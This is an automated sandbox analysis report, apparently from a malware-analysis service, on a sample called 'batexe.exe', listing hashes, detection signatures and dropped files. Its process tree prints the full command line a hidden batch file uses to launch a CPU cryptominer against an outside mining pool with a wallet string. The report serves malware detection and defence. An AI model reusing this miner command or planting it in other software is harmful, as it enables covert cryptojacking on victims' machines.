Analysis
-
max time kernel
296s -
max time network
305s -
platform
windows10-1703_x64 -
resource
win10-20240221-ja -
resource tags
arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
22/02/2024, 00:31
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240221-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20240221-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 1928 b2e.exe 4340 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 4340 cpuminer-sse2.exe 4340 cpuminer-sse2.exe 4340 cpuminer-sse2.exe 4340 cpuminer-sse2.exe 4340 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/4812-5-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4812 wrote to memory of 1928 4812 batexe.exe 75 PID 4812 wrote to memory of 1928 4812 batexe.exe 75 PID 4812 wrote to memory of 1928 4812 batexe.exe 75 PID 1928 wrote to memory of 4504 1928 b2e.exe 76 PID 1928 wrote to memory of 4504 1928 b2e.exe 76 PID 1928 wrote to memory of 4504 1928 b2e.exe 76 PID 4504 wrote to memory of 4340 4504 cmd.exe 79 PID 4504 wrote to memory of 4340 4504 cmd.exe 79
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Users\Admin\AppData\Local\Temp\53B.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\53B.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\53B.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A1D.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4504 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4340
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.6MB
MD59e5a5d0dfeb986e2c48bf6826c1205ed
SHA1cdfb4b962798d5221b608fdd503c763c4c4abddc
SHA25668af1705e1e641869f66541077539458b4ce96fbc5c5c68707c34028c6104c0e
SHA512ca75f49743c04735054d90744401786560fe6fe60986014cc9dca796759ffcd6fe1e7c5d4328374978afbd97e04a292c07b2626618ab8cce6c5085b0e23d251d
-
Filesize
2.4MB
MD58799bfc4c282d0ae5d08d3e0b63e118e
SHA1b129d90f8948be0bf17108fa091c09664b81cea6
SHA256b5023305fcc91a4cb173e9cc4a87a78db17e33d487eae04520c5dc8911590b3f
SHA512d957be230b92a83ad54eeaddf5f953daff81b5fa26b6a3dce465f30ef0a2c37735b87383738761e73176031e04bd4249ffe63a7e4bf862bf8199eb97192df8af
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
670KB
MD5501965f02744fcc11a6a814f7eb14a81
SHA1e7ef74db6592838ce79a28c7742d2d25fc234503
SHA2562728ae71ecaaacb309dd2f686c58e2d734009cb1e45541185994e3c90058a761
SHA5120ea84bfe5a0f9eaa009c169ad5d8180459d5fcf4ec13df92b15e5ca73eb16c57528cd5f79e2ded2425002e665d17d5331e62b11dde7c5573f2277a3a56ce6b95
-
Filesize
745KB
MD5f5a6872a8c4152d6a183892735dccf6c
SHA15b422e92e63963d7e281932107761199270f9722
SHA2567c54786ecb7c2783796b180d7d95b894958247e762740664689fe67625ca22b0
SHA512712bff93ff5e88c7b3c6b85352353c2b68f0a5ab96601bea50370168086cb7b56f5aa75de448bb46f95de5fd0d4dbfe9b2a0bfc264d03567c6b165237e2f8da1
-
Filesize
539KB
MD574a9af92931d5ef404488b72d86a2467
SHA1b48f9c1d7c218ec2c5b3827a66841480e0ff2612
SHA25663bf3e5ad64a4f2ff07812f9af7b8f6db69beb1923ac11838ebf55b1e474c991
SHA5124708f519ea0f2bcd32de22745df03a1c6fa955779d1bb90a02e8b0b6d162cb88083279ba1a79d3826b09d87f52022cbc9c2a3a57bec3ad1d87a8f711e7afbac1
-
Filesize
651KB
MD593204222b2c2a799277e47acc692f02d
SHA19b697282c1a79ec6b84aec1426bfed291fba4e4e
SHA256fd5b3b4c364d2dbbacae4b8ae5a7f136e990ea8ee7d768a4bb8192ab2db46cee
SHA512e46f66397ccb8d6ddbfcfd806f39c6bbdbb8b74d7675d12848ac6b6a3ec53c3d5000c1b3ca09cdf771b7c65d8a500548d096ec8080bf95fd1e164183538c659a
-
Filesize
679KB
MD5bb953c60d941760ee2416f83331ad90a
SHA183eab4574942d0440967a9fb2adec5655c7e7827
SHA25631aa1d633d624405fda6e3bea34f61d0788862b2c57edff669b061eef5ac0415
SHA512289a53048f8e95402d1f22a6b75f7030f726fcc73def4d29c8f0e4492401ff6eb2b4c32c16fe0736f336eb2f274d93ac4aad7759a3f4cfbc2f3fdb780a2149f3
-
Filesize
485KB
MD51aee7bae890a494f7c59aef07414dafb
SHA17455c4127d4b0831ea9b8ae14df769b97d60ca53
SHA2562e68c5b3ca83aa9bfb66e2b95a6007299dea14267dfc2c101891e7c3e45bd65b
SHA512a4fb6fe4e262478821a6246ede1c520ed286888804f2a0080f39e11f2e1b10676a11750bb09ca28b5ce6f7a77bc6190b0ec4384f490bf9bc9e33a13f198a6e1a
-
Filesize
530KB
MD50e7f73ff9f9cd02cded6b5d96031bc03
SHA1fb90848c5979f74536873a815cd67797817dc733
SHA2565be997f03e93832db1e46d04a419af65608db24ec94fbb61cb2b2e1d48760e07
SHA512143f693c6882dd3be92f848ebd45bbceab9bdca2241a701c0e1b49f3d7e6d98500f241b3c1b234f60143297bbffc49c5460251e36612034124b9b89c03457de5
-
Filesize
633KB
MD5a36713ff5b2213464f56198c23c91c39
SHA13bde2cc372ccd8899599bcb39866bd58afdb6256
SHA256e4b123aa658e5eca0e26cd26738d7df18fc94cbf586e739562049dfe6bad6ae8
SHA5128e09467d94fad54228e4fd77d5411531b237f41d554ef19b6785cd1d588d705b5ca5a14d768a04be847d401966bd70fee1007bb7a1655be01f49992d0cbeb828
-
Filesize
631KB
MD506d735d292f55c2aac85a8593ae61fdf
SHA1820e87f722e4aa5a08bf23d933faf1ea013f69da
SHA25653e43f47459202bb3fd184fc1c24d020d61f387c6ef01219b8c38a7fb0872930
SHA51217155ea5d870f8492ce8bca535c2ccb95c871a8d0c4a9d8432616d6e0ba3a17dabe8271ebee1af1e6437daff412d5c073777d76451a0201333d9a878fe9f7b56
-
Filesize
390KB
MD507d5bd6f301b3087d0dc8ec391971f0e
SHA14be8862ff03e6939ff4c3503c3c3e1afbc9e6861
SHA25648a4d24c84b6de1f7876631ef847e3c477f5b74b778dc4363ec272a1ef06f423
SHA512f4a169253cc9a7ac4d821b6a05852f8cd49a67cbb4ce35f80d0683c3253f20c4a17e4a71e80e06093ac8d92e9256ea3b3505488989f36c94736f49ac6250bf7b
-
Filesize
495KB
MD53946b54adbf22f8b1df351af24af04e8
SHA132043cc0401ab017d7726338e9905a9e6b46e65f
SHA256cca3df2c2fbd702db583ff0fa9e129535ddaca8eb9644025bb6611a33aa65f0f
SHA512bb0271c3fd071137a8858b68c9557a93ea2e34ebcc5d4f721e3af4aad6044ffcb66b23257a9e14828dda60707f47c2fca6d75f7deacc823e9a14e280017ccf67